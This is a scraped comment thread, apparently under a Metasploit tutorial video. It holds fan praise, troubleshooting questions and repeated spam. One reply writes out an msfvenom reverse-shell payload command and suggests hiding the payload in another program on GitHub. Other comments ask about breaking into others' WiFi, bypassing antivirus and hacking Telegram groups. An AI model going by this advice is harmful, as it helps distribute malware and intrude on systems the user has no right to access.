Sir I am ur big fan sir I mean I am ur very very big fan love u sir I watched ur all videos and that was fantastic sir. sir please reply me I am ur big fan ur my idol plz reply
You're a great master at explaining things. I love your voice you make everything supernatural understanding without even question I like it Mr. Loi Liang Yang so super extra teaching I will follow you any minutes you upload the video so so so nice teacher. I will share with the community outside here to know that there is a master outside here who teaches like superman along with clean videos for cybersecurity tutorials.
@ Loi Liang Yang Hi Loi, when i am in Terminal and i show exploits, i cant see the information to the far right of the terminal, even when i am in full screen and zooming in and out? its not showing the rank level of the exploits excellent etc etc
Hello and thank you for the explanation. Can you please explain why I got the following message: Exploit completed, but no session was created when I run the Exploit??
Hi and thanks for this useful session Great talk, learned a lot about the metasexploit feature, can you please tell me where I can find copy of your presentation? Thanks for your efforts
sir i am getting an error plzz tell me about this error ............ an smb error login error hac occoured while connecting to the IPC$ tree and when using exploit......... Login Failed: connection reset by peer
Can you make a tutorial series on wireless hacking.... Methods.... I use laptop but don't have WiFi connection only have mobile data so... Plz make a video on it.. How to attack WiFi without external WiFi adapter
Without external adapters?, your best shot is social engineering, once you're inside their wifi, try getting their PIN its a code that even if they change the Wifi password you have access, check out null byte and do some reading maybe, its kinda easy
@@98239 I've got the WPS pin of that WiFi using Dummer software but when I'm using jumpstart it's not working.... And if come to Linux environments every trick or method use WiFi adapters i mean external WiFi adapters... But I've got only laptop and mobile data(enough data).... In that case what i should do..
pls can u make a tutorial on that cos there is a lot of exploit on github but there is no payload attach to it.I read on it.it is something to do with injecting shellcode but i still dont understand it.
@@milkboysg4595 hey , i think you are trying to create a .py payload is simple AF. use this command > msfvenom -p python/meterpreter/reverse_tcp LHOST= HOST LPORT= PORT R > OUTPUTNAME.py You can merge that with another .py programe and upload it to github !
Thanks for the two easy to follow walkthrough! I have a question though, been doing a tutorial with metasploit but when I connect to target computer the connection keeps being killed after a few minutes. Any idea?
Armitage is good but it doesn't give u the exact results a metasploit cli can give .Better to learn cli. U will notice that Kali 2020 version doesn't have Armitage by default as of 2019 version
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking training videos by clicking this link: th-cam.com/channels/1szFCBUWXY3ESff8dJjjzw.htmljoin
" ex::Proto::SMB::Exceptions::LoginError: Login Failed: Connection reset by peer , do you know what is the problem ?? (this is the Scann result), thank you !!
he guys i have a problem metasploit auto use configured payload when i start use multi/handler msf5> use multi/handler [*] Using configured payload Android/meterpreter/reverse_tcp msf5> exploit(multi/handler) >
I have antivirus brother and i can't hack my own computer hahahahahaha i am damn sure nobody can bypass antivirus i don't know does anyone know how to do it i mean bypassing antivirus
I"m thankful people like you are willing to share their knowledge. Everybody you learn all these techniques
The best teacher 🤩
Thank you so much SIR from Pakistan❤
Subbed finnaly another youtuber making these video that are updated
I gotta say very good job and video, watched from start to finish and learned so so much I appreciate you
Bro, this was amazing! Keep up the great work! 👍
This video was helpful..... I'm new on this channel..but I'm following you in each and every video...
Sir, your explanation is great. Thank you for this tutorial. It's really helpful for me.
Hi if you are familiar with meta sploit and kali linux id like to talk to u
amazing, big like frome EGYPT✌️
thanks men,you made it easy
love the way you explain. Pls continue this series. Would like to experience n learn the entire Metasploit series. Awesome
Thank you...Master!!!
Sir I am ur big fan sir I mean I am ur very very big fan love u sir I watched ur all videos and that was fantastic sir. sir please reply me I am ur big fan ur my idol plz reply
You're a great master at explaining things. I love your voice you make everything supernatural understanding without even question I like it Mr. Loi Liang Yang so super extra teaching I will follow you any minutes you upload the video so so so nice teacher. I will share with the community outside here to know that there is a master outside here who teaches like superman along with clean videos for cybersecurity tutorials.
Dude your a great teacher! Thank you for your videos
Well arranged information, thanks.
Hi can I use one payload for 2 phones
Awesome tutorial..expecting videos on daily basis.
Really loved it. Can you please make whole series of Ethical Hacking tools. Thanks :)
Interesting tutorial
Son excelentes tus videos, los explicas muy bien, muchas gracias por tu trabajo, saludos desde México
Saludos dsd Tijuas
Sir this is a great topic.
Thank you so much
thanks for making this, it's a great video!
asesine sir 👍🏼 i can’t wait for more tutorial using metasploit.
You are amazing man thanks for the videos
getting an error : an smb login error occured while connecting to the IPC$ tree. please guide me
*No Words To Express*
great video thankyou
nice content!! Much APPRECIATED
Do more Metasploit tutorials !!.
Thank you for this
@
Loi Liang Yang Hi Loi, when i am in Terminal and i show exploits, i cant see the information to the far right of the terminal, even when i am in full screen and zooming in and out? its not showing the rank level of the exploits excellent etc etc
Sorry, my mistake, yes it is lol
Please teach hacks beginning good teaching
Nice. Thank you.
Hello and thank you for the explanation. Can you please explain why I got the following message: Exploit completed, but no session was created when I run the Exploit??
you're AWESOME!
Please Where can we get the lecture slide?
Hi and thanks for this useful session Great talk, learned a lot about the metasexploit feature, can you please tell me where I can find copy of your presentation? Thanks for your efforts
sir i am getting an error plzz tell me about this error ............ an smb error login error hac occoured while connecting to the IPC$ tree
and when using exploit......... Login Failed: connection reset by peer
Is it possible to scan an IP outside from local network...?
i want to thank you for your great tutorials but i have a question what book do you recommend for beginners to read?
Sir please upload ethical Hacking course videos from beginning so that we can learn from basics. Thank you
Ueaa A
Yess
Hello sir iam a member but cant see a video for member
How did you manage the resolution on a vm
Can you make a tutorial series on wireless hacking.... Methods.... I use laptop but don't have WiFi connection only have mobile data so... Plz make a video on it.. How to attack WiFi without external WiFi adapter
Without external adapters?, your best shot is social engineering, once you're inside their wifi, try getting their PIN its a code that even if they change the Wifi password you have access, check out null byte and do some reading maybe, its kinda easy
@@98239 I've got the WPS pin of that WiFi using Dummer software but when I'm using jumpstart it's not working.... And if come to Linux environments every trick or method use WiFi adapters i mean external WiFi adapters... But I've got only laptop and mobile data(enough data).... In that case what i should do..
Which social engineering methods will be more helpful? I've also got the MAC address... Its a WPS enable connection..
sir is there any way where i can attach a shell to a non metaspoilt(standalone on github) exploit.
pls can u make a tutorial on that cos there is a lot of exploit on github but there is no payload attach to it.I read on it.it is something to do with injecting shellcode but i still dont understand it.
@@milkboysg4595 hey , i think you are trying to create a .py payload is simple AF. use this command > msfvenom -p python/meterpreter/reverse_tcp LHOST= HOST LPORT= PORT R > OUTPUTNAME.py You can merge that with another .py programe and upload it to github !
Sir plz 🙏 make a full series on metasploit. Can you give a over view on metasploitable
100K is really less for such good content and explanation.Lets make it 1M🤝
Ur close to 100k let's goooo
Let's go!
@@LoiLiangYang do u have any advice for someone who is starting cybersecurity college
@@pumv1629 im trying to get into one. Got some advices?
Windows to create a payload application which is best sir
Thanks for the two easy to follow walkthrough! I have a question though, been doing a tutorial with metasploit but when I connect to target computer the connection keeps being killed after a few minutes. Any idea?
Try to a migrate to a different PID.
Meterpreter session 1 closed. Reason: Died why it's happen
Can u tell me plz
Sir is this full tutorial of metasploit
Is there a way to enable usb debugging if the android phone is locked.
Thank
may i have the presentation slides
I get the error 'Connection reset by peer' when I run the scanner......Please can you help with that?
Login failed:connection reset by peer!!
how do u fix that ive disabled firewall and virus protection on target machine and yet!
This is for beginners?
Awesome!
can you please assit me on how to choose RHOST is it just a random number or there is a way to determine example 4444/ 8080. please help.
rhost is the IP address of your victims machine, 444/8080 are examples of ports not IPs
I'm using hackerssummit. com
@@freidafineday6203 thank you
Why do you not answer any questions related to your videos?
Is virtual machine required for this tutorial?
yes
Got my Sub
Great!
Android rat fud series ?? we want
How I can join like a member for unlock videos
Hello
Your from
I'm using hackerssummit. com
Do i need a high programming knowledge to be a ethical hacker?
No but knowing python, JavaScript and Ruby will go a long way
OH MY BUDDHA, THIS IS SO EYEOPENING
Can someone answer this for me, he’s showing that u can gain access to a system without them having to run anything?
Sir how to use download command in metasploit
Just type download followed by the filename which u want to download
hello sir, I am your student from Udemy. Could you please make tutorial video for Metasploit (PHP-FPM Underflow RCE)?
But how to find out IP of target machine outside of my house to target house??
Use your brain.
bro u gotta get into their network and use nmap
or just ask them
CAN U PLEASE MAKE A VIDEO ON USING (ARMITAGE) WITH METASPLOIT
Armitage is metasploit but just a GUI version
Armitage is good but it doesn't give u the exact results a metasploit cli can give .Better to learn cli. U will notice that Kali 2020 version doesn't have Armitage by default as of 2019 version
Armitage is outdated and no longer supported.
@Loi Liang Yang I was trying to virtually remotely execute exploit into my host machine with the vm lol
How to use metasploit windows
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking training videos by clicking this link: th-cam.com/channels/1szFCBUWXY3ESff8dJjjzw.htmljoin
" ex::Proto::SMB::Exceptions::LoginError: Login Failed: Connection reset by peer
, do you know what is the problem ?? (this is the Scann result), thank you !!
❤❤❤😊
Sir when I click exploit it shows an error saying Rex::connection Refused by remote host.Exploit completed but no session was created.
1.Firewall is blocking it. 2.Antivirus 3.System is patched. 4.Try using bind shell 5.Stage payload vs non-stage payload.
Could you do a video on installing metasploit on virtualbox?
hey everyone how are you all ?guys can anyone please tell me how to enable or fix copy and paste in kali linux? its not working with me
he guys i have a problem
metasploit auto use configured payload when i start use multi/handler
msf5> use multi/handler
[*] Using configured payload Android/meterpreter/reverse_tcp
msf5> exploit(multi/handler) >
Cool
I cant even take control of my life :DD
I'm using hackerssummit. com
osm
Don't understand a single thing I need a tutorial for a five day old baby
Hello my name is Osama I'm Egyptian and l need learn hacking android I study python and Java
Like trojan
How To Hack Telegram Private Group?????
没有B站吗,每次看你视频还得翻墙 ! 很麻烦 !还是你的视频最多也只能学学英语
__________ZIP IT BY MANIMUX______
Really interested ...
This guy needs to slow down. I get anxious listening to this guy. Otherwise, good tutorial.
1 😎
I have antivirus brother and i can't hack my own computer hahahahahaha i am damn sure nobody can bypass antivirus i don't know does anyone know how to do it i mean bypassing antivirus
@@Meganano ??